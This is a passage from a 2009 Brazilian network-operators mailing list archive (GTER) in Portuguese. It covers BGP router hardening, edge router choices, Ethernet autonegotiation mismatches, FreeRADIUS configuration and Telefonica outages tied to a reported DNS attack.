divulgadas para cada > peer, enviando somente as rotas das suas redes para evitar que seu AS > seja usado como "transito" indevidamente, onde tr?fego n?o direcionado > para as suas redes s?o roteados atrav?s da sua infraestrutura. > > Outra coisa ? filtrar pacotes com endere?o de origem de redes privadas > (RFC1918 [1]), n?o era muito comum mas cheguei a pegar situa??es de > operadoras roteando pacotes assim para o meu AS e gerando tr?fego > desnecess?rio. > > Bom, esses s?o os que lembro de cabe?a no momento. > > Att., > Marcos Hack. > > [1] http://tools.ietf.org/html/rfc1918 > > > > 2009/6/3 Patrick Barreto Petronetto : >> Pessoal, >> O que geralmente voc?s fazem para proteger os roteadores que rodam BGP? >> H? alguma medida de seguran?a que deve ser aplicada (configurada) no >> equipamento para evitar algum tipo de ataque? >> >> Valeu! >> >> Patrick Barreto Petronetto >> patrick at vol.net.br From eschoedler at viavale.com.br Wed Jun 3 19:35:17 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Wed, 3 Jun 2009 19:35:17 -0300 Subject: [GTER] roteador de borda References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com><4A26B858.30008@cyberweb.com.br> <200906031715.08601.herbert@scw.net.br> Message-ID: <10CE12FA0B384538A7FBA869558C798F@admgaz.com.br> Existe um paper da Cisco dizendo qual ? o melhor modelo para determinado tr?fego (Mbps e Mpps): http://www.cisco.com/web/partners/downloads/765/tools/quickreference/routerperformance.pdf Para voc? ter uma id?ia de pre?o, no Mercado Livre tem algumas pessoas vendendo... fica por sua conta e risco. Abra?o. ----- Original Message ----- From: "Marconi Pereira" To: Sent: Wednesday, June 03, 2009 5:53 PM Subject: [GTER] roteador de borda Caros, estou pesquisando sobre solu??o de roteador de borda para link entre 100 e 155Mbps. 1-qual roteador Cisco adequado (alguem tem ideia do preco do equip + IOS?); 2-Vyatta? (eh estavel, eh facil de configurar, tem algum feature de QoS?) 3-servidor dell com quagga? (nao rodo BGP, mas pode surgir a necessidade) Obrigado, M. From jarruda-gter at jarruda.com Wed Jun 3 20:48:34 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Wed, 03 Jun 2009 19:48:34 -0400 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <2632ec520906031142p73162f20jf48848f0d44772b8@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <2632ec520906031142p73162f20jf48848f0d44772b8@mail.gmail.com> Message-ID: <4A270BD2.9060408@jarruda.com> Gelson Dias Santos wrote: > Problema ? que essa lenda ? muito insistente. A apenas dois anos atr?s > eu tive problemas assim entre um Cisco PIX e um Cisco Catalyst 29XX. > Continuo adotando a pr?tica de SEMPRE fixar as portas de servidores, > routers, switches e qq outra coisa que n?o tenha motivo para trocar de > porta sem que os administradores de rede estejam cientes. > Qual a 'idade' destes PIX/29xx ? Como o Pina comentou, problema de autoneg, deveriam ser coisas do passado. Autoneg, oferece algumas facilidades, como RFI, e auto MDI/MDI-X. Podendo fazer, eu recomendo. > Gelson > > 2009/6/3 Antonio Carlos Pina : >> Voce checou poss?veis port-mismatch ? Auto-negocia??o X portas for?adas ? >> >> Corre uma lenda por a? que as portas fastethernet devem ser for?adas a >> 100Mb/s. Na verdade essa hist?ria remonta h? anos quando existia um bug na >> negocia??o de alguns equipamentos que faziam os mesmos negociarem como half. >> Isso acabou e s? sobrou a lenda. >> >> A regra ?: >> >> - Auto-negocia??o com auto-negoci???o >> - Porta for?ada (sem autoneg) com Porta for?ada >> >> Qualquer outra combina??o trar? problemas. >> >> Voc? colocou 1 notebook ligado direto no link para eliminar problemas com >> sua rede, seu firewall, etc? >> >> Grato. >> >> 2009/6/3 Patrich Pizzolo >> >>> Bom dia a todos, >>> gostaria de ter uma opini?o dos ilustres colegas que integram esta lista. >>> Tenho um link de 10Mbps por fibra e ap?s um problema em um switch da GVT >>> meu >>> tempo de resposta entre a Eth do meu router e a do router da gvt que s?o >>> interligados por uma fibra est? chegando a picos de at? 946ms com uma m?dia >>> em torno de 10ms, isso com o link isolado e j? testei com diversos outros >>> routers e sempre obtenho os mesmos tempos de resposta, definitivamente n?o >>> tenho problema nesta ponta. Possuo um outro link com a BrT e est? tudo >>> normal com tempo de resposta excelente sem nenhuma varia??o deste tipo. >>> Estou nesta situa??o h? 7 dias e o pessoal da operadora insiste em dizer >>> que >>> est? tudo normal. J? nem aguento mais falar com eles... >>> >>> Algu?m tem alguma id?ia? >>> >>> No momento estou pensando em acionar e cancelar o link. >>> >>> Abra?os, >>> Obrigado! >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter From jarruda-gter at jarruda.com Wed Jun 3 20:50:54 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Wed, 03 Jun 2009 19:50:54 -0400 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> Message-ID: <4A270C5E.3060804@jarruda.com> Patrich Pizzolo wrote: > Obrigado pelas respostas, > n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 dias > atr?s este problema aqui, s? ficou ok quando forcei minha eth para 100Mbps > Full-Duplex! > Por?m o problema est? bem isolado, j? coloquei diversos notebooks e desktops > e o problema sempre persiste sim! Qual a configuracao do outro elemento ? Se um lado tiver auto e o outro 100/fd, voce DEVERIA ter um mismatch. Note, voce PODE ter implementacoes especificas....a Nortel tinha o CANA, acho que a cisco outras, onde voce fazia autoneg, mas somente um subset era anunciado (voce FAZ autoneg, mas so oferece 100FD por exemplo). > > Creio que seja exatamente o caso de porta do Switch Datacom no qual o > Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente de conta > e ouvidoria para verificarem isto e eles continuam afirmando categoricamente > que n?o h? problema! > > Alguma id?ia? > > > 2009/6/3 Juliano S. Nascimento > >> >> >>> Voce checou poss?veis port-mismatch ? >> Auto-negocia??o X portas for?adas ? >>> Corre uma lenda por a? que as portas fastethernet devem ser >> for?adas a >>> 100Mb/s. Na verdade essa hist?ria >> remonta h? anos quando existia um bug na >> negocia??o de alguns equipamentos que faziam os mesmos >> negociarem como >>> half. >>> Isso acabou e s? sobrou a >> lenda. >>> A regra ?: >>> >>> - >> Auto-negocia??o com auto-negoci???o >>> - Porta for?ada (sem autoneg) com Porta for?ada >>> >>> Qualquer outra combina??o trar? >> problemas. >>> Voc? colocou 1 notebook ligado >> direto no link para eliminar problemas com >>> sua rede, seu >> firewall, etc? >>> Grato. >>> >>> 2009/6/3 >> Patrich Pizzolo >>>> Bom dia >> a todos, >>>> gostaria de ter uma opini?o dos ilustres >> colegas que integram esta >>>> lista. >>>> Tenho um link >> de 10Mbps por fibra e ap?s um problema em um switch da GVT >>>> meu >>>> tempo de resposta entre a Eth do meu router e >> a do router da gvt que s?o >>>> interligados por uma fibra >> est? chegando a picos de at? 946ms com uma >> m?dia >>>> em torno de 10ms, isso com o link isolado e >> j? testei com diversos >>>> outros >>>> routers e >> sempre obtenho os mesmos tempos de resposta, definitivamente >> n?o >>>> tenho problema nesta ponta. Possuo um outro link >> com a BrT e est? tudo >>>> normal com tempo de resposta >> excelente sem nenhuma varia??o deste tipo. >> Estou nesta situa??o h? 7 dias e o pessoal da >> operadora insiste em dizer >>>> que >>>> est? >> tudo normal. J? nem aguento mais falar com eles... >>>> Algu?m tem alguma id?ia? >>>> >>>> No momento estou pensando em acionar e cancelar o link. >> Caro, >> >> Tivemos o mesmo problema algum tempo atras com a >> GVT. Depois de muitos testes e alegarem que nossos servidores estavam mal >> configurados e n?o terem resultados positivos com esta >> afirma??o, trocaram nossa porta no Switch deles, resolvendo >> nosso problema. >> >> OBS: Alegaram que a vlan estava com uma >> configura??o errada, ocasionado tais problemas. >> >> >> >>>> Abra?os, >>>> >> Obrigado! >>>> -- >>>> gter list >> https://eng.registro.br/mailman/listinfo/gter >> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> >> -- >> >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > > From jarruda-gter at jarruda.com Wed Jun 3 20:52:42 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Wed, 03 Jun 2009 19:52:42 -0400 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <73d1f88a0906031428v145fdacl5ceb931d2d098b1a@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <73d1f88a0906031428v145fdacl5ceb931d2d098b1a@mail.gmail.com> Message-ID: <4A270CCA.5090307@jarruda.com> Gustavo Rodrigues Ramos wrote: > Pessoal, > > 2009/6/3 Antonio Carlos Pina : >> Voce checou poss?veis port-mismatch ? Auto-negocia??o X portas for?adas ? >> >> Corre uma lenda por a? que as portas fastethernet devem ser for?adas a >> 100Mb/s. Na verdade essa hist?ria remonta h? anos quando existia um bug na >> negocia??o de alguns equipamentos que faziam os mesmos negociarem como half. >> Isso acabou e s? sobrou a lenda. > > A lenda ainda "existe" para os equipamentos que n?o seguem o padr?o > (IEEE 802.3). > >> A regra ?: >> >> - Auto-negocia??o com auto-negoci???o >> - Porta for?ada (sem autoneg) com Porta for?ada > > A regra vale para portas 10/100 Mbps. Para 1 Gbps ? sempre auto-negocia??o. Nope, voce PODE ter 1G sem autonegociacao.... Sinceramente, eu sou CONTRA fixar... ja que voce sem autoneg, nao faz RFI... > > Gustavo. > -- > gter list https://eng.registro.br/mailman/listinfo/gter From lscrlstld at gmail.com Wed Jun 3 21:01:46 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Wed, 3 Jun 2009 21:01:46 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_Freeradius=3A_atributos_de_checagem_?= =?iso-8859-1?q?do_grupo_n=E3o_funcionam?= In-Reply-To: References: <2F825D207D3246EBA6A9E984341CDE79@admgaz.com.br><2BB87D070AB64003A5343AFCEDD26356@admgaz.com.br><3B49658924B14819BC4957F400F6A01D@admgaz.com.br><4A25EA0A.6000101@onda.psi.br> Message-ID: <58F501E85BE042E8BD77D07311488A67@toledoPC> > > Atualmente utilizo a tabela radcheckgroup apenas para o > n?mero m?ximo de conex?es simult?neas, checagem j? prevista > pelo freeradius, e s? funcionou quando usei o operador :=. > Tamb?m estou tentando restringir o acesso de determinados > grupos pelos atributos NAS-IP-Address ou NAS-Identifier, sem Utilize HINTS > sucesso at? agora. J? li v?rias vezes a documenta??o, mas n?o > consegui implementar ainda. Estou fazendo alguns testes > usando o modulo checkval na se??o de autoriza??o. Voc? pode > dar uma olhada na documenta??o desse m?dulo, talvez ele > atenda ?s suas necessidades. > From eschoedler at viavale.com.br Wed Jun 3 21:16:49 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Wed, 3 Jun 2009 21:16:49 -0300 Subject: [GTER] =?iso-8859-1?q?Freeradius=3A_atributos_de_checagem_do_grup?= =?iso-8859-1?q?o_n=E3o_funcionam?= References: <2F825D207D3246EBA6A9E984341CDE79@admgaz.com.br><2BB87D070AB64003A5343AFCEDD26356@admgaz.com.br><3B49658924B14819BC4957F400F6A01D@admgaz.com.br><4A25EA0A.6000101@onda.psi.br> <58F501E85BE042E8BD77D07311488A67@toledoPC> Message-ID: <01E33ACA787C420C8A4DBDE062BBDF78@admgaz.com.br> Em 2009-06-03, Toledo, Luis Carlos escreveu: >Utilize HINTS Ol? Luis! Obrigado pela resposta. No entanto, o manual [1] do FR n?o me ajuda muito. N?o vejo como ele poder? me ajudar, uma vez que preciso saber do sql de que grupo ele faz parte e ent?o adicionar atributos ? requisi??o recebida para ent?o decidir se devo autenticar ou rejeitar. Teria algum exemplo mais pr?tico ? Forte abra?o! [1] http://wiki.freeradius.org/CONFIGURATION_FILES#HINTS http://wiki.freeradius.org/Adding%2C_Removing%2C_Modifying_Attributes_for_further_processing From renato.diogo at gmail.com Wed Jun 3 23:15:16 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Wed, 3 Jun 2009 23:15:16 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_Problema_Navega=E7=E3o_=28_Telefonic?= =?iso-8859-1?q?a_=29?= In-Reply-To: <724d72960906021137v233d1330ieb4bf01788384569@mail.gmail.com> References: <276fbe8b0905291639t76a1cf49x3773cf19e619b87@mail.gmail.com> <200905310250.20403.herbert@scw.net.br> <7a152a290906010921l6c84c541u44baa2ab9110de4a@mail.gmail.com> <724d72960906021137v233d1330ieb4bf01788384569@mail.gmail.com> Message-ID: <724d72960906031915g2fc27139n370939a3ccd0ec65@mail.gmail.com> Senhores eu relaciono esse problema de navega??o da telefonica com ataques segundo essa noticia: http://info.abril.com.br/noticias/tecnologia-pessoal/laudo-confirma-ataque-cracker-a-telefonica-03062009-46.shl http://idgnow.uol.com.br/telecom/2009/06/03/speedy-telefonica-entrega-laudo-do-cpqd-sobre-pane-no-servico-a-anatel/ http://www1.folha.uol.com.br/folha/informatica/ult124u576232.shtml Mesmo n?o usando o DNS dela, eu acho que foi colocado filtro no meio do caminho pra resolver os problemas e ferrou com tudo. Alguem tem alguma posi??o em rela??o a isto? Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/2 Renato de Oliveira Diogo : > Senhores > > algu?m seguiu o conselho que o Gustavo passou a?? > > Aqui depois que ele aplicou as regras aparentemente minimizou muito o problema. > > Ainda estou tentando falar com a telefonica para falar sobre o > assunto, mas ainda n?o consegui. Pois se ? em alguns equipamentos > deles s?o eles que devem corrigir esses filtros. > > Comigo eu percebi o seguinte, come?ou a ocorrer o problema na ultima > semana de mar?o (todo esse tempo mesmo), creio que logo depois que a > pr?pria telefonica teve um problema com um backbone em Miami. E logo > depois disso temos tamb?m outros problemas de ataque aos computadores > da telefonica. Como em todo ataque, se coloca filtro pra tentar > resolver o problema e a chance de ter colocar algum filtro e n?o ter > removido ? alto. > > O que voc?s dissem... > > Atenciosamente > ________________________________________________ > Renato de Oliveira Diogo > > Bacharel em Ci?ncia da Computa??o > UNESP - Bauru > > LPIC1 - Linux Professional Institute Certification - N?vel 1 > > renato.diogo at gmail.com > renato.diogo at yahoo.com.br > > > > 2009/6/1 Mike Tesliuk : >> N?s aqui ainda estamos com problemas com o link da telefonica , tive >> que trocar o acesso dos usu?rios para um Virtua porque esta terrivel. >> >> Telefonica disse que n?o h? anormalidades, mas que eu tenho que >> aguardar o pessoal de roteadores me responder. >> >> 2009/5/31 Herbert Faleiros : >>> On Sat 30 May 2009 09:44:37 Farrapo - LDR wrote: >>>> Deve especificar que o MSS seja modificado somente nos pacotes maiores que >>>> o desejado. Ex.: Incluir na tua linha: tcp-mss=1401-65535 >>> >>> >>> Ou ent?o usa o seguinte: new-mss=clamp-to-pmtu >>> (mesma t?cnica que descrevi no outro e-mail como exemplo p/ o Linux) >>> >>> -- >>> Herbert >>> -- >>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > From gustavo at nexthop.com.br Thu Jun 4 00:41:39 2009 From: gustavo at nexthop.com.br (Gustavo Rodrigues Ramos) Date: Thu, 4 Jun 2009 00:41:39 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <4A270CCA.5090307@jarruda.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <73d1f88a0906031428v145fdacl5ceb931d2d098b1a@mail.gmail.com> <4A270CCA.5090307@jarruda.com> Message-ID: <73d1f88a0906032041q5c1c7082h2d8bae7eeb6ccb98@mail.gmail.com> Julio, 2009/6/3 Julio Arruda : >> A regra vale para portas 10/100 Mbps. Para 1 Gbps ? sempre >> auto-negocia??o. > > Nope, voce PODE ter 1G sem autonegociacao.... > Sinceramente, eu sou CONTRA fixar... ja que voce sem autoneg, nao faz RFI... Eu n?o falei que n?o pode ter 1Gbps sem auto-negocia??o. Eu s? falei que a regra [1] ? mandat?ria para utilizar auto-negocia??o para 1000Base-T (at? onde eu me lembro...). Sim, alguns fabricantes implementam 1Gbps/full hard coded. Sim, existem par?metros (como o flow-control) que podem ser ajustados de acordo com a necessidade (on/off) e a porta sobe... mas a? j? n?o ? a "regra". [1] http://standards.ieee.org/getieee802/download/802.3-2005_section2.pdf (p.603) BTW, eu tamb?m sou contra fixar.. :) Gustavo. From tukso.antartiko at gmail.com Thu Jun 4 00:47:53 2009 From: tukso.antartiko at gmail.com (Tukso Antartiko) Date: Thu, 4 Jun 2009 00:47:53 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_Problema_Navega=E7=E3o_=28_Telefonic?= =?iso-8859-1?q?a_=29?= In-Reply-To: <724d72960906031915g2fc27139n370939a3ccd0ec65@mail.gmail.com> References: <276fbe8b0905291639t76a1cf49x3773cf19e619b87@mail.gmail.com> <200905310250.20403.herbert@scw.net.br> <7a152a290906010921l6c84c541u44baa2ab9110de4a@mail.gmail.com> <724d72960906021137v233d1330ieb4bf01788384569@mail.gmail.com> <724d72960906031915g2fc27139n370939a3ccd0ec65@mail.gmail.com> Message-ID: O problema atual tem UMA causa identificada, o rompimento na outra ponta do anel e SE o tr?fego n?o estava balanceado isso ? SUFICIENTE para gerar problemas no Brasil. O que, se for o caso, me faz perguntar o que faz a conex?o redundante custar mais que o dobro sendo que quando se precisa da dita redund?ncia a mesma falha. Podem ainda estar ocorrendo outros problemas simultaneamente, como um ataque hacker com uma assinatura espec?fica, similar a alguns usos normais. Ou ativaram algum shapper para garantir um "melhor" uso da banda agora dispon?vel, melhor uso conforme o recomendado na press release: http://saladeprensa.telefonica.es/documentos/terremoto_honduras.pdf Al?m da habilidade deste suposto shapper em distinguir IPs comerciais (NAT/proxy) dos demais: usu?rios dom?sticos fazendo muitas requisi??es. Sobre este ataque antigo, o de DNS, minha d?vida, que espero que o laudo do CNPQ esclare?a ? se este servidor de DNS modificado que a ph?nica est? utilizando, quebrando RFC para exibir an?ncios, teve a mesma performance e comportamento que os demais do mercado. Espero tamb?m que esclare?a se as querys adicionais geradas pelo redirecionamento e conte?do da p?gina de busca n?o contribu?ram em nada para a sobrecarga. E que o uso deste software, que permite a entrada da SCM no promissor mercado de an?ncios virtuais, garante que a Internet continue funcionando de forma est?vel e previs?vel conforme definido nos padr?es que a regem. Mas eles devem esclarecer isso t?o bem como esclareceram que o primeiro apag?o, que afetou o estado inteiro foi apenas por falha de um ?nico equipamento e que a carga, arquitetura, configura??o e monitoramento da rede, bem como os procedimentos adotados n?o poderiam ter tido influ?ncia significativa nenhuma no ocorrido. Mas n?o, n?o responda agora. Veja a resposta logo mais, depois dos nossos comerciais ... On 6/3/09, Renato de Oliveira Diogo wrote: > Senhores > > eu relaciono esse problema de navega??o da telefonica com ataques > segundo essa noticia: > http://info.abril.com.br/noticias/tecnologia-pessoal/laudo-confirma-ataque-cracker-a-telefonica-03062009-46.shl > http://idgnow.uol.com.br/telecom/2009/06/03/speedy-telefonica-entrega-laudo-do-cpqd-sobre-pane-no-servico-a-anatel/ > http://www1.folha.uol.com.br/folha/informatica/ult124u576232.shtml > > Mesmo n?o usando o DNS dela, eu acho que foi colocado filtro no meio > do caminho pra resolver os problemas e ferrou com tudo. > > Alguem tem alguma posi??o em rela??o a isto? > > Atenciosamente > ________________________________________________ > Renato de Oliveira Diogo > > Bacharel em Ci?ncia da Computa??o > UNESP - Bauru > > LPIC1 - Linux Professional Institute Certification - N?vel 1 > > renato.diogo at gmail.com > renato.diogo at yahoo.com.br > > > > 2009/6/2 Renato de Oliveira Diogo : >> Senhores >> >> algu?m seguiu o conselho que o Gustavo passou a?? >> >> Aqui depois que ele aplicou as regras aparentemente minimizou muito o >> problema. >> >> Ainda estou tentando falar com a telefonica para falar sobre o >> assunto, mas ainda n?o consegui. Pois se ? em alguns equipamentos >> deles s?o eles que devem corrigir esses filtros. >> >> Comigo eu percebi o seguinte, come?ou a ocorrer o problema na ultima >> semana de mar?o (todo esse tempo mesmo), creio que logo depois que a >> pr?pria telefonica teve um problema com um backbone em Miami. E logo >> depois disso temos tamb?m outros problemas de ataque aos computadores >> da telefonica. Como em todo ataque, se coloca filtro pra tentar >> resolver o problema e a chance de ter colocar algum filtro e n?o ter >> removido ? alto. >> >> O que voc?s dissem... >> >> Atenciosamente >> ________________________________________________ >> Renato de Oliveira Diogo >> >> Bacharel em Ci?ncia da Computa??o >> UNESP - Bauru >> >> LPIC1 - Linux Professional Institute Certification - N?vel 1 >> >> renato.diogo at gmail.com >> renato.diogo at yahoo.com.br >> >> >> >> 2009/6/1 Mike Tesliuk : >>> N?s aqui ainda estamos com problemas com o link da telefonica , tive >>> que trocar o acesso dos usu?rios para um Virtua porque esta terrivel. >>> >>> Telefonica disse que n?o h? anormalidades, mas que eu tenho que >>> aguardar o pessoal de roteadores me responder. >>> >>> 2009/5/31 Herbert Faleiros : >>>> On Sat 30 May 2009 09:44:37 Farrapo - LDR wrote: >>>>> Deve especificar que o MSS seja modificado somente nos pacotes maiores >>>>> que >>>>> o desejado. Ex.: Incluir na tua linha: tcp-mss=1401-65535 >>>> >>>> >>>> Ou ent?o usa o seguinte: new-mss=clamp-to-pmtu >>>> (mesma t?cnica que descrevi no outro e-mail como exemplo p/ o Linux) >>>> From renato.diogo at gmail.com Thu Jun 4 06:17:16 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Thu, 4 Jun 2009 06:17:16 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_Problema_Navega=E7=E3o_=28_Telefonic?= =?iso-8859-1?q?a_=29?= In-Reply-To: References: <276fbe8b0905291639t76a1cf49x3773cf19e619b87@mail.gmail.com> <200905310250.20403.herbert@scw.net.br> <7a152a290906010921l6c84c541u44baa2ab9110de4a@mail.gmail.com> <724d72960906021137v233d1330ieb4bf01788384569@mail.gmail.com> <724d72960906031915g2fc27139n370939a3ccd0ec65@mail.gmail.com> Message-ID: <724d72960906040217v66a99045xc02de09b0fff598d@mail.gmail.com> Ent?o mas o problema a que estou me referindo e ? o que est? descrito nesse t?pico ? antigo e N?O foi resolvido, muio menos reconhecido pelos t?cnicos da telefonica at? o momento. Pois este problema eu relato desde o final do m?s de mar?o e muitos colegas aqui relatou muito antes desse rompimento da fibra. Quando me refiro aos ataques aos servidores DNS da telefonica, se tivesse afetado somente esses servidores eu n?o sentiria, pois sempre utilizei servidores recursivos pr?prios (imagino que muitos colegas nosso aqui com o mesmo problema tamb?m tenha servidores pr?prios). Por?m, como se costuma em um ataque, ? os t?cnicos ir colocando filtros a torto e direita sem ver as conseq??ncias depois. Em rela??o a este rompimento, aparentemente eu n?o fui atingido, pois n?o estou sentindo, provavelmente por ter BGP e blocos pr?prios, apesar de a telefonica ser o ?nico link de tr?nsito meu. []s ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/4 Tukso Antartiko : > O problema atual tem UMA causa identificada, o rompimento na outra > ponta do anel e SE o tr?fego n?o estava balanceado isso ? SUFICIENTE > para gerar problemas no Brasil. O que, se for o caso, me faz perguntar > o que faz a conex?o redundante custar mais que o dobro sendo que > quando se precisa da dita redund?ncia a mesma falha. > > Podem ainda estar ocorrendo outros problemas simultaneamente, como um > ataque hacker com uma assinatura espec?fica, similar a alguns usos > normais. > > Ou ativaram algum shapper para garantir um "melhor" uso da banda agora > dispon?vel, melhor uso conforme o recomendado na press release: > http://saladeprensa.telefonica.es/documentos/terremoto_honduras.pdf > Al?m da habilidade deste suposto shapper em distinguir IPs comerciais > (NAT/proxy) dos demais: usu?rios dom?sticos fazendo muitas > requisi??es. > > Sobre este ataque antigo, o de DNS, minha d?vida, que espero que o > laudo do CNPQ esclare?a ? se este servidor de DNS modificado que a > ph?nica est? utilizando, quebrando RFC para exibir an?ncios, teve a > mesma performance e comportamento que os demais do mercado. Espero > tamb?m que esclare?a se as querys adicionais geradas pelo > redirecionamento e conte?do da p?gina de busca n?o contribu?ram em > nada para a sobrecarga. E que o uso deste software, que permite a > entrada da SCM no promissor mercado de an?ncios virtuais, garante que > a Internet continue funcionando de forma est?vel e previs?vel conforme > definido nos padr?es que a regem. > > Mas eles devem esclarecer isso t?o bem como esclareceram que o > primeiro apag?o, que afetou o estado inteiro foi apenas por falha de > um ?nico equipamento e que a carga, arquitetura, configura??o e > monitoramento da rede, bem como os procedimentos adotados n?o poderiam > ter tido influ?ncia significativa nenhuma no ocorrido. > > Mas n?o, n?o responda agora. Veja a resposta logo mais, depois dos > nossos comerciais ... > > On 6/3/09, Renato de Oliveira Diogo wrote: >> Senhores >> >> eu relaciono esse problema de navega??o da telefonica com ataques >> segundo essa noticia: >> http://info.abril.com.br/noticias/tecnologia-pessoal/laudo-confirma-ataque-cracker-a-telefonica-03062009-46.shl >> http://idgnow.uol.com.br/telecom/2009/06/03/speedy-telefonica-entrega-laudo-do-cpqd-sobre-pane-no-servico-a-anatel/ >> http://www1.folha.uol.com.br/folha/informatica/ult124u576232.shtml >> >> Mesmo n?o usando o DNS dela, eu acho que foi colocado filtro no meio >> do caminho pra resolver os problemas e ferrou com tudo. >> >> Alguem tem alguma posi??o em rela??o a isto? >> >> Atenciosamente >> ________________________________________________ >> Renato de Oliveira Diogo >> >> Bacharel em Ci?ncia da Computa??o >> UNESP - Bauru >> >> LPIC1 - Linux Professional Institute Certification - N?vel 1 >> >> renato.diogo at gmail.com >> renato.diogo at yahoo.com.br >> >> >> >> 2009/6/2 Renato de Oliveira Diogo : >>> Senhores >>> >>> algu?m seguiu o conselho que o Gustavo passou a?? >>> >>> Aqui depois que ele aplicou as regras aparentemente minimizou muito o >>> problema. >>> >>> Ainda estou tentando falar com a telefonica para falar sobre o >>> assunto, mas ainda n?o consegui. Pois se ? em alguns equipamentos >>> deles s?o eles que devem corrigir esses filtros. >>> >>> Comigo eu percebi o seguinte, come?ou a ocorrer o problema na ultima >>> semana de mar?o (todo esse tempo mesmo), creio que logo depois que a >>> pr?pria telefonica teve um problema com um backbone em Miami. E logo >>> depois disso temos tamb?m outros problemas de ataque aos computadores >>> da telefonica. Como em todo ataque, se coloca filtro pra tentar >>> resolver o problema e a chance de ter colocar algum filtro e n?o ter >>> removido ? alto. >>> >>> O que voc?s dissem... >>> >>> Atenciosamente >>> ________________________________________________ >>> Renato de Oliveira Diogo >>> >>> Bacharel em Ci?ncia da Computa??o >>> UNESP - Bauru >>> >>> LPIC1 - Linux Professional Institute Certification - N?vel 1 >>> >>> renato.diogo at gmail.com >>> renato.diogo at yahoo.com.br >>> >>> >>> >>> 2009/6/1 Mike Tesliuk : >>>> N?s aqui ainda estamos com problemas com o link da telefonica , tive >>>> que trocar o acesso dos usu?rios para um Virtua porque esta terrivel. >>>> >>>> Telefonica disse que n?o h? anormalidades, mas que eu tenho que >>>> aguardar o pessoal de roteadores me responder. >>>> >>>> 2009/5/31 Herbert Faleiros : >>>>> On Sat 30 May 2009 09:44:37 Farrapo - LDR wrote: >>>>>> Deve especificar que o MSS seja modificado somente nos pacotes maiores >>>>>> que >>>>>> o desejado. Ex.: Incluir na tua linha: tcp-mss=1401-65535 >>>>> >>>>> >>>>> Ou ent?o usa o seguinte: new-mss=clamp-to-pmtu >>>>> (mesma t?cnica que descrevi no outro e-mail como exemplo p/ o Linux) >>>>> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From lscrlstld at gmail.com Thu Jun 4 09:27:51 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Thu, 4 Jun 2009 09:27:51 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_RES=3A_Problema_Navega=E7=E3o_=28_Te?= =?iso-8859-1?q?lefonica_=29?= In-Reply-To: References: <276fbe8b0905291639t76a1cf49x3773cf19e619b87@mail.gmail.com><200905310250.20403.herbert@scw.net.br><7a152a290906010921l6c84c541u44baa2ab9110de4a@mail.gmail.com><724d72960906021137v233d1330ieb4bf01788384569@mail.gmail.com><724d72960906031915g2fc27139n370939a3ccd0ec65@mail.gmail.com> Message-ID: <9AF1A5BEB44E41E591C87198EDFDBD6A@toledoPC> Grande "Tukso"! > Sobre este ataque antigo, o de DNS, minha d?vida, que espero > que o laudo do CNPQ esclare?a ? se este servidor de DNS > modificado que a ph?nica est? utilizando, quebrando RFC para > exibir an?ncios, teve a mesma performance e comportamento que > os demais do mercado. Espero tamb?m que esclare?a se as > querys adicionais geradas pelo redirecionamento e conte?do da > p?gina de busca n?o contribu?ram em nada para a sobrecarga. E Bem lembrado, discutiu-se muitos isso aqui na lista (redirecionamento). > que o uso deste software, que permite a entrada da SCM no > promissor mercado de an?ncios virtuais, garante que a > Internet continue funcionando de forma est?vel e previs?vel > conforme definido nos padr?es que a regem. Sabemos que o interesse econ?mico vence... Abs Toledo From stuntshell at gmail.com Wed Jun 3 18:38:42 2009 From: stuntshell at gmail.com (Jean Rousseau Franco) Date: Wed, 3 Jun 2009 18:38:42 -0300 Subject: [GTER] roteador de borda In-Reply-To: References: 